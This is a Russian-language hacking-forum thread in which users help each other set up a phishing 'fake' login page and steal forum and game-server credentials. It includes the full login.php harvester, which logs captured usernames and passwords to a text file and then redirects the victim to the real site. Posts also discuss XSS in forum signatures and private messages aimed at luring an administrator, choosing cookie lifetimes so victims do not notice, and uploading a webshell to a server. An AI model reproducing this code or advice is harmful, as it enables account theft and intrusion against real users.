5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
куда потом ссылку кидать с залитыми файлами?
вставляешь сюда вместо [Ссылки могут видеть только зарегистрированные пользователи. ]
Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?
Залил вебшелл. конекчусь к гм серверу пишет:
"Too many connections"
Что делать? Если я получу админку от обвязки стрессвеба и вырублю серв на пару мин приконнектиться можно бут?
через че конектишься навикат чтоли? лутше конектся через шелл т.к от навиката пользы 0
Последний раз редактировалось TakeThat; 26.06.2010 в 16:31.
Дошел до стадии, когда нужно залить фейк на хостинг, успешно залил, получился фейк, но при вводе каких-нибудь данных вида акк:пасс, у меня не перебрасывает с фейка на оригинальную страницу авторизации, хотя при этом в блокноте создается запись акк:пасс, которую я вводил. В чем может быть проблема?
Содержимое файла login.php
Код:
<?php
/*
Фейк был создан при помощи генератора ArxWFakeGen.
Автор программы ArxWolf.
Официальный сайт программы и новых версий http://webxakep.net
*/
$BASE="game.txt";
$IS_EMAIL=false;
$LOCATION="http://сайт_сервера/forum/";
$p0=$_REQUEST["UserName"];
$p1=$_REQUEST["PassWord"];
$headers = "";
$info="$p0:$p1:\n";
if ($IS_EMAIL){
mail($BASE, "*** Вам пришёл сюрприз!", $headers.$info);
} else {
$fd=fopen($BASE,"a+");
fwrite($fd,$info);
fclose($fd);
}
header("Location:$LOCATION");
?>
$LOCATION="http://сайт_сервера/forum/";
Вот тут попробуй выставить [Ссылки могут видеть только зарегистрированные пользователи. ]
Еще возможно ты не регистрировался на форуме, а там запрещено просматривать форум, если ты не зарегистрировался и поэтому тебя перебрасывает на страничку авторизации.
Всё равно когда ты заходишь [Ссылки могут видеть только зарегистрированные пользователи. ] то ты заходишь на [Ссылки могут видеть только зарегистрированные пользователи. ] по умолчанию. И только потом тебя переадресовывает куда нибудь.
F4ll3nL0rD, спасибо! Ошибка заключалась именно в этом.
IncubusX, на том форуме обязательна прибавка index.php, без него форум просто не откроется, т.е. вид [Ссылки могут видеть только зарегистрированные пользователи. ] не открывается, и с него не переадресовывает.
Добавлено через 24 минуты
Теперь уже вопрос по самому xss:
Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?
А, вот, все работает, код нормальный) Просто нужно было подождать, пока в game.txt запишется акк:пасс.
Пошел работать дальше
Последний раз редактировалось L0stHorror; 28.06.2010 в 20:57.
Причина: Добавлено сообщение
Еще такой вопрос: админ должен зайти именно на просмотр моего ЛС (личного сообщения), но не того, что в подписи? Т.е. просто при просмотре ЛС, начинает работать код xss, что в подписи, и он перенаправляет его на фейк, а потом мне идут его акк:пасс?
Да он должен прочитать ваше сообщения плюс он должен попасть курсором по вашему фейку и тогда его перекинет на ваш фейк и если он тупой то он введет свои данные.
Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?
Добавил:
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
Что-то у меня как-то код выборочно работает что ли... 2 знакомым для проверки кидал - все нормально, а потом уже не приходит.
2 вопроса еще назрело:
1) на 1 странице m0nk выкладывал xss для разных браузеров, это для тех браузеров, что стоят у меня, или подразумеваются те, с которых будут заходить жертвы? Т.е. вот я допустим пользовался 1 xss (для ie+ff), а знакомый у меня заходил через оперу, и его акк:пасс я узнал. Просто зачем тогда в доп. вопросах был зада вопрос можно ли вставлять сразу 2 xss в подпись?
2) setTime(getTime()+30*24*60*60*1000), 30 это кол-во дней, которые куки будут храниться у юзера, дальше идут слова о том, что их нужно изменить, ну и подразумевается на меньшее число, вопрос - зачем? Не лучше ли это число оставлять таким, или даже больше, чтобы жертва прочитав ЛС на след. день никуда не переходила, а читала именно ЛС. Ведь как я понимаю 1 день - кукисы стерты, и снова переход на фейк - заметно, палится. И влияют ли в настройках самого браузера опции "какой кол-во дней хранить кукисы"?
Добавил:
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
1. Да именно браузер жертвы.Можно вставить сколько хочешь xss.
2.Если в браузере выставлено удалять кукисы через определенное кол-во дней или после завершения сеанса, то они удаляются.
Цитата:
Сообщение от L0stHorror
Самому же создавать левые аккаунты на форуме, кидать им ЛС с "основы", и после этого через них пытаться зайти на фейк свой - не получится? Т.к. у меня кукисы уже есть?
Здравствуйте.
Решил попробовать сделать XSS
Фейк сделал и залил чтоб работал без проблем, а влт сжедать чтоб выскакивали на форуме не могу.
Подскажите пожалуйста что я неправильно делаю, вот код: